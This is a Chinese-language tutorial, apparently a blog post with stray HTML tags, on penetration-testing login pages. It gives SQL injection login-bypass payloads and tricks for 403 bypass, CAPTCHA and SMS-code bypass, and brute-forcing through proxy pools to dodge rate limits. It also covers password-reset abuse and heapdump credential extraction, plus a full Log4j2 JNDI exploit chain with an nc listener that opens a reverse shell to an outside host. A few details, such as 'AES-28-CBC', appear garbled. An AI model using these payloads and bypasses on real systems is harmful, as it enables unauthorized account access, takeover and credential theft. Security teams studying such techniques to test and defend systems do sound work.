登录口渗透测试技术详解<\/h1>

常规操作<\/h2>

目录扫描技术<\/h3>

常用工具<\/strong>：<\/p>

dirsearch<\/li>
gobuster<\/li>
wfuzz<\/li>
TidePlues<\/li> <\/ul> <\/li>

扫描策略<\/strong>：<\/p>

使用不同扫描工具组合，因算法和字典差异可提高发现率<\/li>
特别关注403状态码路径，可能存在绕过机会<\/li> <\/ul> <\/li>

403绕过技术<\/strong>：<\/p>

使用dirsearch_bypass403工具<\/li>
尝试以下拼接方式：

..\/<\/code><\/li>
..;\/<\/code><\/li>
\/*\/<\/code><\/li>
%09<\/code><\/li>
%20<\/code><\/li> <\/ul> <\/li>
发现未授权页面后尝试SQL注入或参数构造<\/li> <\/ul> <\/li> <\/ol> SQL注入攻击<\/h3> 检测原则<\/strong>：<\/p> 所有数据交互点都应测试SQL注入可能<\/li> <\/ul> <\/li> 万能密码技术<\/strong>：<\/p> 已知用户名情况： admin<\/span>' or 1=1 # <\/span><\/span><\/span><\/code><\/pre><\/li> 未知用户名情况： 1<\/span>' or 1=1 # <\/span><\/span><\/span><\/code><\/pre><\/li> 当#被过滤时： admin<\/span>' or '<\/span>1<\/span>'='<\/span>1<\/span>' or '<\/span>1<\/span>'='<\/span>1<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> SQL执行原理<\/strong>：<\/p> 示例后台语句： select<\/span> *<\/span> from<\/span> users where<\/span> username=<\/span>'1'<\/span> or<\/span> 1<\/span>=<\/span>1<\/span> #<\/span>' and password=$password <\/span><\/span><\/span><\/code><\/pre><\/li> 注意and<\/code>优先级高于or<\/code><\/li> <\/ul> <\/li> <\/ol> 弱口令爆破<\/h3> 用户名探测<\/strong>：<\/p> 通过不同用户名返回不同提示信息识别有效用户名<\/li> <\/ul> <\/li> 爆破防护绕过<\/strong>：<\/p> 使用Yakit的随机延迟功能<\/li> 使用代理池，每次请求更换IP<\/li> 伪造多人登录场景<\/li> <\/ul> <\/li> <\/ol> 逻辑缺陷利用<\/h2> 验证码绕过<\/h3> 图形验证码绕过<\/strong>：<\/p> 修改值为空\/null\/true<\/li> 验证码复用或失效<\/li> 随机值可控（前端生成验证码）<\/li> <\/ul> <\/li> 验证码前端生成检测<\/strong>：<\/p> 检查请求URL或参数中的base64编码值<\/li> 如url?characters=1111<\/code>形式<\/li> <\/ul> <\/li> 自动化工具<\/strong>：<\/p> BurpSuite定义宏<\/li> Yakit定义序列<\/li> <\/ul> <\/li> <\/ol> 短信验证码绕过<\/h3> 手机号变形<\/strong>：<\/p> 数字前加空格、+86、+086、+0086、+0 00<\/li> 添加特殊字符：\/r<\/code>、\/n<\/code>、?<\/code>、#<\/code>、!<\/code><\/li> <\/ul> <\/li> 多值提交<\/strong>：<\/p> moblile=number,number<\/code><\/li> mobile=number&mobile=number<\/code><\/li> <\/ul> <\/li> 其他绕过方式<\/strong>：<\/p> 提交其他用户的验证码<\/li> 四位验证码暴力破解<\/li> 尝试固定值：111111、000000<\/li> 修改接收验证码的手机号（拦截请求修改）<\/li> <\/ul> <\/li> <\/ol> 密码重置漏洞<\/h3> 流程跳跃<\/strong>：<\/p> 伪造回显数据包跳过验证步骤<\/li> 直接进入修改密码环节<\/li> <\/ul> <\/li> 参数替换<\/strong>：<\/p> 修改mobile参数未与cookie绑定<\/li> 替换为其他用户手机号修改其密码<\/li> <\/ul> <\/li> <\/ol> 信息收集技术<\/h2> 使用手册分析<\/h3> 获取初始密码或命名规则<\/li> 生成针对性爆破字典<\/li> <\/ul> Web网站与APP关联<\/h3> 攻击面扩展<\/strong>：<\/p> Web端受限时可尝试关联APP<\/li> APP可能简化注册流程（如仅手机号注册）<\/li> <\/ul> <\/li> 数据库共用<\/strong>：<\/p> Web和APP可能共用同一数据库<\/li> 在APP注册的用户可能可用于Web登录<\/li> <\/ul> <\/li> <\/ol> 网站源码分析<\/h3> 开源框架识别<\/strong>：<\/p> 查找GitHub等开源项目引用<\/li> 获取默认凭证或进行代码审计<\/li> <\/ul> <\/li> 演示系统利用<\/strong>：<\/p> 通过软件名称\/图片在FOFA、鹰图搜索演示系统<\/li> 发现上传路径或查询接口后在真实系统尝试<\/li> <\/ul> <\/li> <\/ol> 网站框架漏洞<\/h2> Webpack技术<\/h3> 特征识别<\/strong>：<\/p> 存在app.xxxxxx.js<\/code>和chunk.xxxxx.js<\/code><\/li> 可能暴露Webpack:\/\/<\/code>和sourceMappingURL<\/code><\/li> <\/ul> <\/li> 自动化工具<\/strong>：<\/p> 使用Packer Fuzzer工具：自动提取API及参数<\/li> 检测七类漏洞：未授权访问<\/li> 敏感信息泄露<\/li> CORS<\/li> SQL注入<\/li> 水平越权<\/li> 弱口令<\/li> 任意文件上传<\/li> <\/ol> <\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> Shiro框架<\/h3> 特征识别<\/strong>：<\/p> "记住我"功能<\/li> 前端代码出现rememberMe<\/code><\/li> 响应包含rememberMe=deleteMe<\/code><\/li> <\/ul> <\/li> 漏洞分类<\/strong>：<\/p> Shiro-550 (CVE-2016-4437)<\/strong>： Apache Shiro<=1.2.4<\/li> 硬编码密钥<\/li> <\/ul> <\/li> Shiro-721 (CVE-2019-13422)<\/strong>： Apache Shiro<1.4.2<\/li> AES-28-CBC加密存在Padding Oracle Attack漏洞<\/li> <\/ul> <\/li> <\/ul> <\/li> 探测工具<\/strong>：<\/p> Heimdallr插件<\/li> <\/ul> <\/li> <\/ol> Log4j2漏洞<\/h3> 漏洞原理<\/strong>：<\/p> JNDI注入缺陷<\/li> 通过${jndi:xxx}<\/code>触发远程代码执行<\/li> <\/ul> <\/li> 检测工具<\/strong>：<\/p> Yakit插件：Log4Shell漏洞检测<\/li> BurpSuite：TsojanScan被动扫描<\/li> <\/ul> <\/li> 利用案例<\/strong>：<\/p> 在登录页面参数如name=<\/code>、eventide=<\/code>处发现漏洞<\/li> <\/ul> <\/li> 利用步骤<\/strong>：<\/p> # 启动JNDIExploit<\/span> <\/span><\/span>java -jar JNDIExploit-1.2-SNAPSHOT.jar -l 8888<\/span> -p 6666<\/span> -i 192.168.242.4 <\/span><\/span> <\/span><\/span># 启动nc监听<\/span> <\/span><\/span>nc -lvvp 10010<\/span> <\/span><\/span> <\/span><\/span># 构造payload访问<\/span> <\/span><\/span>http:\/\/your-ip\/path?param=<\/span>${<\/span>jndi:ldap:\/\/192.168.242.4:8888\/Basic\/ReverseShell\/192.168.242.4\/10010}<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 网站接口漏洞<\/h2> 源代码接口拼接<\/h3> JS文件分析<\/strong>：<\/p> 查找未授权接口<\/li> 构造数据访问<\/li> <\/ul> <\/li> 报错信息利用<\/strong>：<\/p> 通过不断报错构造请求方式和参数<\/li> <\/ul> <\/li> <\/ol> Swagger接口<\/h3> 发现方式<\/strong>：<\/p> 目录爆破发现Swagger-ui界面<\/li> <\/ul> <\/li> 自动化工具<\/strong>：<\/p> python swagger-hack2.0.py -u https:\/\/xxxx\/swagger\/v1\/swagger.json <\/span><\/span><\/code><\/pre> 快速探测接口存活状态<\/li> 可能直接发现信息泄露接口<\/li> <\/ul> <\/li> <\/ol> Springboot Actuator<\/h3> env目录利用<\/strong>：<\/p> 目录爆破发现env目录<\/li> Spring actuator未授权漏洞<\/li> <\/ul> <\/li> heapdump文件分析<\/strong>：<\/p> 下载heapdump文件（.hprof）<\/li> 使用JDumpSpider提取敏感信息： java -jar JDumpSpider.jar heapdump <\/span><\/span><\/code><\/pre><\/li> 优先级信息：数据库凭证及地址<\/li> Shiro密钥<\/li> 部署端口信息<\/li> <\/ol> <\/li> <\/ul> <\/li> <\/ol> 渗透测试方法论<\/h2> 黑盒测试原则<\/strong>：<\/p> 不断尝试不同攻击方式<\/li> 注重细节分析<\/li> <\/ul> <\/li> 登录页面测试要点<\/strong>：<\/p> 检查每个请求及回显数据包<\/li> 分析参数注释及报错信息<\/li> 逻辑漏洞需要发散思维<\/li> 考虑程序设计未覆盖的场景<\/li> <\/ul> <\/li> <\/ol>